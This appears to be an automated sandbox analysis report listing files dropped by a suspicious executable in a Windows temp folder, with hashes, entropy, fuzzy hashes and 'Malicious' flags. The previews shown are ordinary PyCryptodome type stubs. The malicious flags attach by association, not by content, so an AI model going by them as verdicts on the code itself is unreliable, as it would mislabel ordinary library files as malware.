                                                                                                                                            Preview:from typing import Union, Optional..from typing_extensions import TypedDict, Unpack, NotRequired....Buffer = Union[bytes, bytearray, memoryview]....class TurboSHAKE(object):.... def __init__(self, capacity: int, domain_separation: int, data: Union[Buffer, None]) -> None: ..... def update(self, data: Buffer) -> TurboSHAKE : ..... def read(self, length: int) -> bytes: ..... def new(self, data: Optional[Buffer]=None) -> TurboSHAKE: .......class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):318
                                                                                                                                            Entropy (8bit):5.138819601387305
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBXa4REsuB9cebopy1LxyJQmUUzrIY3MT7O3ymK95lvdgzSNFIF:1REYBXa4RE1B9YSsumtvIY3eH1dmF
                                                                                                                                            MD5:0F8CE87AD72ECACADED5EB6869C0C063
                                                                                                                                            SHA1:4C8EBDA5C1826749B747BF268036DC11A1FD9CC3
                                                                                                                                            SHA-256:86DEA501F8ED56BAE7652415243B38845AB1C94A1E4AD0E737A98A37A80235EA
                                                                                                                                            SHA-512:8CD3AF34C3FD94E6DBE15575BB3AC6C84AFBAF14067066E53EEE3A727866C5E626E323C6ED4736186E21056D4A27EF57184DFAE378A9B8E53210F340051649ED
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Preview:from typing import Union..from typing_extensions import TypedDict, Unpack, NotRequired....from .TurboSHAKE128 import TurboSHAKE....Buffer = Union[bytes, bytearray, memoryview]....class Args(TypedDict):.. domain: NotRequired[int].. data: NotRequired[Buffer]....def new(**kwargs: Unpack[Args]) -> TurboSHAKE: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14848
                                                                                                                                            Entropy (8bit):5.212941287344097
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:2F/1nb2mhQtkRySMfJ2ycxFzShJD9bAal2QDeJKcqgQx2QY:M2fKRQB2j8JD2fJagQx2QY
                                                                                                                                            MD5:F4EDB3207E27D5F1ACBBB45AAFCB6D02
                                                                                                                                            SHA1:8EAB478CA441B8AD7130881B16E5FAD0B119D3F0
                                                                                                                                            SHA-256:3274F49BE39A996C5E5D27376F46A1039B6333665BB88AF1CA6D37550FA27B29
                                                                                                                                            SHA-512:7BDEBF9829CB26C010FCE1C69E7580191084BCDA3E2847581D0238AF1CAA87E68D44B052424FDC447434D971BB481047F8F2DA1B1DEF6B18684E79E63C6FBDC5
                                                                                                                                            Malicious:true
                                                                                                                                            Antivirus:
                                                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14336
                                                                                                                                            Entropy (8bit):5.181291194389683
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:hF/1nb2mhQt7fSOp/CJPvADQHKtxSOvbcqgEvcM+:N2fNKOZWPIDnxVlgEvL
                                                                                                                                            MD5:9D28433EA8FFBFE0C2870FEDA025F519
                                                                                                                                            SHA1:4CC5CF74114D67934D346BB39CA76F01F7ACC3E2
                                                                                                                                            SHA-256:FC296145AE46A11C472F99C5BE317E77C840C2430FBB955CE3F913408A046284
                                                                                                                                            SHA-512:66B4D00100D4143EA72A3F603FB193AFA6FD4EFB5A74D0D17A206B5EF825E4CC5AF175F5FB5C40C022BDE676BA7A83087CB95C9F57E701CA4E7F0A2FCE76E599
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14336
                                                                                                                                            Entropy (8bit):5.140195114409974
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:RsiHXqpo0cUp8XnUp8XjEQnlDtJI6rcqgcx2:f6DcUp8XUp8AclDA69gcx2
                                                                                                                                            MD5:8A92EE2B0D15FFDCBEB7F275154E9286
                                                                                                                                            SHA1:FA9214C8BBF76A00777DFE177398B5F52C3D972D
                                                                                                                                            SHA-256:8326AE6AD197B5586222AFA581DF5FE0220A86A875A5E116CB3828E785FBF5C2
                                                                                                                                            SHA-512:7BA71C37AAF6CB10FC5C595D957EB2846032543626DE740B50D7CB954FF910DCF7CEAA56EB161BAB9CC1F663BADA6CA71973E6570BAC7D6DA4D4CC9ED7C6C3DA
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13824
                                                                                                                                            Entropy (8bit):5.203867759982304
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:WsiHXqpwUiv6wPf+4WVrd1DFrCqwWwcqgfvE:s6biio2Pd1DFmlgfvE
                                                                                                                                            MD5:FE16E1D12CF400448E1BE3FCF2D7BB46
                                                                                                                                            SHA1:81D9F7A2C6540F17E11EFE3920481919965461BA
                                                                                                                                            SHA-256:ADE1735800D9E82B787482CCDB0FBFBA949E1751C2005DCAE43B0C9046FE096F
                                                                                                                                            SHA-512:A0463FF822796A6C6FF3ACEBC4C5F7BA28E7A81E06A3C3E46A0882F536D656D3F8BAF6FB748008E27F255FE0F61E85257626010543FC8A45A1E380206E48F07C
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15360
                                                                                                                                            Entropy (8bit):5.478301937972917
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:hZ9WXA7M93g8U7soSchhiLdjM5J6ECTGmDZkRsP0rcqgjPrvE:8Q0gH7zSccA5J6ECTGmDua89gjPrvE
                                                                                                                                            MD5:34EBB5D4A90B5A39C5E1D87F61AE96CB
                                                                                                                                            SHA1:25EE80CC1E647209F658AEBA5841F11F86F23C4E
                                                                                                                                            SHA-256:4FC70CB9280E414855DA2C7E0573096404031987C24CF60822854EAA3757C593
                                                                                                                                            SHA-512:82E27044FD53A7309ABAECA06C077A43EB075ADF1EF0898609F3D9F42396E0A1FA4FFD5A64D944705BBC1B1EBB8C2055D8A420807693CC5B70E88AB292DF81B7
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18432
                                                                                                                                            Entropy (8bit):5.69608744353984
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:nkP5RjF7GsIyV6Lx41NVYaVmtShQRKAa8+DSngkov:onx7RI26LuuHKz8+DbN
                                                                                                                                            MD5:42C2F4F520BA48779BD9D4B33CD586B9
                                                                                                                                            SHA1:9A1D6FFA30DCA5CE6D70EAC5014739E21A99F6D8
                                                                                                                                            SHA-256:2C6867E88C5D3A83D62692D24F29624063FCE57F600483BAD6A84684FF22F035
                                                                                                                                            SHA-512:1F0C18E1829A5BAE4A40C92BA7F8422D5FE8DBE582F7193ACEC4556B4E0593C898956065F398ACB34014542FCB3365DC6D4DA9CE15CB7C292C8A2F55FB48BB2B
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):19456
                                                                                                                                            Entropy (8bit):5.7981108922569735
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:qPHNP3MjevhSY/8EBbVxcJ0ihTLdFDuPHgj+kf4D:sPcKvr/jUJ0sbDGAj+t
                                                                                                                                            MD5:AB0BCB36419EA87D827E770A080364F6
                                                                                                                                            SHA1:6D398F48338FB017AACD00AE188606EB9E99E830
                                                                                                                                            SHA-256:A927548ABEA335E6BCB4A9EE0A949749C9E4AA8F8AAD481CF63E3AC99B25A725
                                                                                                                                            SHA-512:3580FB949ACEE709836C36688457908C43860E68A36D3410F3FA9E17C6A66C1CDD7C081102468E4E92E5F42A0A802470E8F4D376DAA4ED7126818538E0BD0BC4
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):5.865452719694432
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:y1jwGPJHLvzcY1EEerju9LcTZ6RO3RouLKtcyDNOcwgjxo:QjwyJUYToZwOLuzDNB1j
                                                                                                                                            MD5:C8FE3FF9C116DB211361FBB3EA092D33
                                                                                                                                            SHA1:180253462DD59C5132FBCCC8428DEA1980720D26
                                                                                                                                            SHA-256:25771E53CFECB5462C0D4F05F7CAE6A513A6843DB2D798D6937E39BA4B260765
                                                                                                                                            SHA-512:16826BF93C8FA33E0B5A2B088FB8852A2460E0A02D699922A39D8EB2A086E981B5ACA2B085F7A7DA21906017C81F4D196B425978A10F44402C5DB44B2BF4D00A
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):22016
                                                                                                                                            Entropy (8bit):5.867732744112887
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:51jwGPJHLxzcY1EEerju9LcTZ6RO3RouLKtcyDNIegjxo:rjwyJOYToZwOLuzDNI7j
                                                                                                                                            MD5:A442EA85E6F9627501D947BE3C48A9DD
                                                                                                                                            SHA1:D2DEC6E1BE3B221E8D4910546AD84FE7C88A524D
                                                                                                                                            SHA-256:3DBCB4D0070BE355E0406E6B6C3E4CE58647F06E8650E1AB056E1D538B52B3D3
                                                                                                                                            SHA-512:850A00C7069FFDBA1EFE1324405DA747D7BD3BA5D4E724D08A2450B5A5F15A69A0D3EAF67CEF943F624D52A4E2159A9F7BDAEAFDC6C689EACEA9987414250F3B
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.860044313282322
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:xFDL3RqE3MjjQ95UnLa+1WT1aA7qHofg5JptfISH2mDDXfgjVx2:jDLh98jjRe+1WT1aAeIfMzxH2mDDIj
                                                                                                                                            MD5:59BA0E05BE85F48688316EE4936421EA
                                                                                                                                            SHA1:1198893F5916E42143C0B0F85872338E4BE2DA06
                                                                                                                                            SHA-256:C181F30332F87FEECBF930538E5BDBCA09089A2833E8A088C3B9F3304B864968
                                                                                                                                            SHA-512:D772042D35248D25DB70324476021FB4303EF8A0F61C66E7DED490735A1CC367C2A05D7A4B11A2A68D7C34427971F96FF7658D880E946C31C17008B769E3B12F
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):27136
                                                                                                                                            Entropy (8bit):5.917025846093607
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:tFYLXRqEnMgj969GUnLa+1WT1aA7qHofg5JptfIS320DXwElrgjhig:PYLB9Mgj0e+1WT1aAeIfMzx320DXD+j
                                                                                                                                            MD5:8194D160FB215498A59F850DC5C9964C
                                                                                                                                            SHA1:D255E8CCBCE663EE5CFD3E1C35548D93BFBBFCC0
                                                                                                                                            SHA-256:55DEFCD528207D4006D54B656FD4798977BD1AAE6103D4D082A11E0EB6900B08
                                                                                                                                            SHA-512:969EEAA754519A58C352C24841852CF0E66C8A1ADBA9A50F6F659DC48C3000627503DDFB7522DA2DA48C301E439892DE9188BF94EEAF1AE211742E48204C5E42
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2690
                                                                                                                                            Entropy (8bit):5.462230743946182
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:4KwpHd7fl2L+JB/CZGDGYGwgmkRpZevBx2WBfcocococ/wfPPyLGMQ:SHd7Co3GBWvtBW/Q
                                                                                                                                            MD5:3B5E0A528B026687FB8DC520BF1C443F
                                                                                                                                            SHA1:B504C2024F1FC2671EC658BE3392BD2D1CB9CAA7
                                                                                                                                            SHA-256:5A96A7491719268FFD6FCBC7D6E5851FBC1C5E7D5E5C4F0ED69A20E633D6EF7D
                                                                                                                                            SHA-512:113A260C69DD6465E3FD496C7FE0FE7D94D1BDF853E231B634D55CF94696E51C514511539D87370A9C383FB7CF25EF417E9E898C564797AD869C37363CC3ECF4
                                                                                                                                            Malicious:false
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2085
                                                                                                                                            Entropy (8bit):5.17608688273199
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:aF9+C++h+N+9+jZ+c+4+8+v1tZccj8ny7Mk8kjqu5BCViGHh29398O4Q:aF94UgQY7nTaZccj8ny7Mk8kjqu5BCVO
                                                                                                                                            MD5:36A0E0920BC50C5AC662383955E311A1
                                                                                                                                            SHA1:FFF119192B3BB62C9EC36F076FE2F65012BB0DEA
                                                                                                                                            SHA-256:A4763996875B02499733BA1336240470992D9B7C5B1AF986DD0FE6FFC52F5642
                                                                                                                                            SHA-512:78B5C6B11A20678902A236FAE88E1E78D933475D5AD618054B6D0FF9FCC6F9F2A1CD92B8D745D92CDDA9BDDA1DB621333ACAEAAF3E3332E7DD8094E4CAAD4D34
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import overload..from typing_extensions import Literal....from Crypto.Hash.SHA1 import SHA1Hash..from Crypto.Hash.SHA224 import SHA224Hash..from Crypto.Hash.SHA256 import SHA256Hash..from Crypto.Hash.SHA384 import SHA384Hash..from Crypto.Hash.SHA512 import SHA512Hash..from Crypto.Hash.SHA3_224 import SHA3_224_Hash..from Crypto.Hash.SHA3_256 import SHA3_256_Hash..from Crypto.Hash.SHA3_384 import SHA3_384_Hash..from Crypto.Hash.SHA3_512 import SHA3_512_Hash....@overload..def new(name: Literal["1.3.14.3.2.26"]) -> SHA1Hash: .....@overload..def new(name: Literal["SHA1"]) -> SHA1Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.4"]) -> SHA224Hash: .....@overload..def new(name: Literal["SHA224"]) -> SHA224Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.1"]) -> SHA256Hash: .....@overload..def new(name: Literal["SHA256"]) -> SHA256Hash: .....@overload..def new(name: Literal["2.16.840.1.101.3.4.2.2"]) -> SHA384Hash: .....@overload..def new(name: Lit
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12800
                                                                                                                                            Entropy (8bit):4.999870226643325
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:DzFRF/1nb2mhQtk4axusjfkgZhoYDQgRjcqgQvEty:DzFd2f64axnTTz5D1gQvEty
                                                                                                                                            MD5:C89BECC2BECD40934FE78FCC0D74D941
                                                                                                                                            SHA1:D04680DF546E2D8A86F60F022544DB181F409C50
                                                                                                                                            SHA-256:E5B6E58D6DA8DB36B0673539F0C65C80B071A925D2246C42C54E9FCDD8CA08E3
                                                                                                                                            SHA-512:715B3F69933841BAADC1C30D616DB34E6959FD9257D65E31C39CD08C53AFA5653B0E87B41DCC3C5E73E57387A1E7E72C0A668578BD42D5561F4105055F02993C
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):13312
                                                                                                                                            Entropy (8bit):5.025153056783597
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:AF/1nb2mhQtks0iiNqdF4mtPjD02A5APYcqgYvEL2x:62f6fFA/4GjDFcgYvEL2x
                                                                                                                                            MD5:C4CC05D3132FDFB05089F42364FC74D2
                                                                                                                                            SHA1:DA7A1AE5D93839577BBD25952A1672C831BC4F29
                                                                                                                                            SHA-256:8F3D92DE840ABB5A46015A8FF618FF411C73009CBAA448AC268A5C619CF84721
                                                                                                                                            SHA-512:C597C70B7AF8E77BEEEBF10C32B34C37F25C741991581D67CF22E0778F262E463C0F64AA37F92FBC4415FE675673F3F92544E109E5032E488F185F1CFBC839FE
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):16384
                                                                                                                                            Entropy (8bit):5.235115741550938
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:XTRgffnRaNfBj9xih1LPK73jm6AXiN4rSRIh42gDhgvrjcqgCieT3WQ:XafgNpj9cHW3jqXeBRamDOZgCieT
                                                                                                                                            MD5:1E201DF4B4C8A8CD9DA1514C6C21D1C4
                                                                                                                                            SHA1:3DC8A9C20313AF189A3FFA51A2EAA1599586E1B2
                                                                                                                                            SHA-256:A428372185B72C90BE61AC45224133C4AF6AE6682C590B9A3968A757C0ABD6B4
                                                                                                                                            SHA-512:19232771D4EE3011938BA2A52FA8C32E00402055038B5EDF3DDB4C8691FA7AE751A1DC16766D777A41981B7C27B14E9C1AD6EBDA7FFE1B390205D0110546EE29
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):15360
                                                                                                                                            Entropy (8bit):5.133714807569085
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:JZNGXEgvUh43G6coX2SSwmPL4V7wTdDlpaY2cqgWjvE:EVMhuGGF2L4STdDyYWgWjvE
                                                                                                                                            MD5:76C84B62982843367C5F5D41B550825F
                                                                                                                                            SHA1:B6DE9B9BD0E2C84398EA89365E9F6D744836E03A
                                                                                                                                            SHA-256:EBCD946F1C432F93F396498A05BF07CC77EE8A74CE9C1A283BF9E23CA8618A4C
                                                                                                                                            SHA-512:03F8BB1D0D63BF26D8A6FFF62E94B85FFB4EA1857EB216A4DEB71C806CDE107BA0F9CC7017E3779489C5CEF5F0838EDB1D70F710BCDEB629364FC288794E6AFE
                                                                                                                                            Malicious:true
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):764
                                                                                                                                            Entropy (8bit):4.362163899247177
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                            MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                            SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                            SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                            SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):313
                                                                                                                                            Entropy (8bit):4.63314311726341
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:6:1REYBbAmV4uDbIBFeLBysOZ4fJEBd1pHWERrBFeLsEiJos:1REYBbr+uWFeLB/OifJEjv2EDFeLsEi5
                                                                                                                                            MD5:107D6CC5B80CF3E12D074590F5D47AE5
                                                                                                                                            SHA1:E89B8FCF239CD49A0CFC3D7561C783EA63E2FD19
                                                                                                                                            SHA-256:FD17DE9B1D9EEB3950223BE5E5B16A8CA3EE0A7E4822557F0B882BFF3D67A1D0
                                                                                                                                            SHA-512:B6E46F3846AFB5E59C5C6C1454FEEEC7FDAA01665F811BFE5338035A5D34CE16347F58EE9921118BEE11D73DE9A5CC56B2B5CC5257EF406D90E495DE3F0C0435
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Callable....def encode(data: bytes,.. marke: str,... passphrase: Optional[bytes] = ...,... randfunc: Optional[Callable[[int],bytes]] = ...) -> str: .........def decode(pem_data: str,.. passphrase: Optional[bytes] = ...) -> Tuple[bytes, str, bool]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):617
                                                                                                                                            Entropy (8bit):4.780296247881002
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBbr0mRE1BWS+EUe+LvjJMmxKxoIiNLojqyW38RJifJEvP5peYmrEidkLvFye:1REAYmC1X+u+/JMme4Loey1RMEnzurA/
                                                                                                                                            MD5:F1EBC42749EE63F11F55A1DD77B38380
                                                                                                                                            SHA1:9B592373655652EA3D08B222C68D62BED560C5E4
                                                                                                                                            SHA-256:17C9A6398CEC2B74DF62786B9A84553ECFE8660DBFBEEC47663BBEF0EBD8E167
                                                                                                                                            SHA-512:AB23620DF998CBB2519A67A272E12CA92C48167B1945DFE666C7E427BC3B9E3B6555130D04EF54A31639149A528A6F080B3220D28309E6E7D001274BB10C4A51
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Tuple, Optional, Union, Callable..from typing_extensions import NotRequired....from Crypto.Util.asn1 import DerObject..from Crypto.IO._PBES import ProtParams......def wrap(private_key: bytes,.. key_oid: str,.. passphrase: Union[bytes, str] = ...,.. protection: str = ...,.. prot_params: Optional[ProtParams] = ...,.. key_params: Optional[DerObject] = ...,.. randfunc: Optional[Callable[[int], str]] = ...) -> bytes: .........def unwrap(p8_private_key: bytes, passphrase: Optional[Union[bytes, str]] = ...) -> Tuple[str, bytes, Optional[bytes]]: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):781
                                                                                                                                            Entropy (8bit):4.711755021635503
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:12:1REYBrqRE1BWIWK+li56EotVepVnKqYjqytJifJEjP51K+lEhB5q:1REBC1WK+cH+mnKLeytMErDK+KQ
                                                                                                                                            MD5:104D32B3D75141B0546625AC5336C1EC
                                                                                                                                            SHA1:BDF345B0EBE5DC7E238D79FBD5FD63362C561195
                                                                                                                                            SHA-256:816463C1012174C626FDF286098D851BF55E201879FE9DEEADF777FD1CEA0794
                                                                                                                                            SHA-512:70AA3BEDD20562702462F69EF3209DF71C1CBDA73BDDDA451E7A2B490095AA1FEDEA4D7093BB8DB955148396A7F28BA9E7D8AC0B1B4644E4F252DED8A780A633
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Optional, Callable, TypedDict..from typing_extensions import NotRequired....class PbesError(ValueError):.. .......class PBES1(object):.. @staticmethod.. def decrypt(data: bytes, passphrase: bytes) -> bytes: .......class ProtParams(TypedDict):.. iteration_count: NotRequired[int].. salt_size: NotRequired[int].. block_size: NotRequired[int].. parallelization: NotRequired[int]....class PBES2(object):.. @staticmethod.. def encrypt(data: bytes,.. passphrase: bytes,.. protection: str,.. prot_params: Optional[ProtParams] = ...,.. randfunc: Optional[Callable[[int],bytes]] = ...) -> bytes: ....... @staticmethod.. def decrypt(data:bytes, passphrase: bytes) -> bytes: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):84
                                                                                                                                            Entropy (8bit):4.429188967239666
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3:1mMkoERZ6sLmL3VosL1ydxFo+CsaCAX7y:1+ZRZHL+fW4CAe
                                                                                                                                            MD5:FC8E19CDD7D4DF22C857035B5460E98F
                                                                                                                                            SHA1:FB9CD60C695F8D19ECF44531A14EB9245E764F37
                                                                                                                                            SHA-256:37E4E3AA463400EF4A3F01217B46A3237D2FDA2795C78F936CC936AAB1875701
                                                                                                                                            SHA-512:314603B6BB03875A9B59F8A76BF32DABD71E52DC30D44C48C6C975746416227EF05144888620D3984712B78CBE899CE8DCEA4ED34C4883015562A7E217F98571
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from Crypto.Math._IntegerBase import IntegerBase as Integer..__all__ = ['Integer']..
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):841
                                                                                                                                            Entropy (8bit):4.5810465816498
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REqa50Kg2G2+kEgR8WSgEgRnxDNaVSYnblDNaj:wCKzG2+NgVSBgZxDQVrRDQj
                                                                                                                                            MD5:A3ADEC74F909A4E9CFB74C5EFFD5162D
                                                                                                                                            SHA1:4325C3C9FD0FDA73843197C2B99E55C5DCACDFE4
                                                                                                                                            SHA-256:F73DAEA86E4577FDE3B6E314A1DA38441A8F0CA8AC64A018821E10706B80C903
                                                                                                                                            SHA-512:F0A41213290CA4D46C1A012D8FBF38B3E16D05D61BF815634EC587B03644F707D5726BFB264AE504BFB4A070210A2CCE1898B25A0697504C6B557D06BF7B2894
                                                                                                                                            Malicious:true
                                                                                                                                            Preview:from typing import Callable, Optional, Union, Set....PrimeResult = int....COMPOSITE: PrimeResult..PROBABLY_PRIME: PrimeResult....def miller_rabin_test(candidate: int, iterations: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def lucas_test(candidate: int) -> PrimeResult: ....._sieve_base: Set[int]..def test_probable_prime(candidate: int, randfunc: Optional[Callable[[int],bytes]]=None) -> PrimeResult: .....def generate_probable_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...,.. prime_filter: Callable[[int],bool] = ...) -> int: .....def generate_probable_safe_prime(*,.. exact_bits: int = ...,.. randfunc: Callable[[int],bytes] = ...) -> int: .....
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3810
                                                                                                                                            Entropy (8bit):4.6872218402303165
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:24:1REjiTAaR+gZ2KDRSjmnV69RuezESHcAFPS+ep0npIk/6I3ZuieIeKvJK5fCKsLm:giTnXDojmW8ABwi+M30W85fzsLm
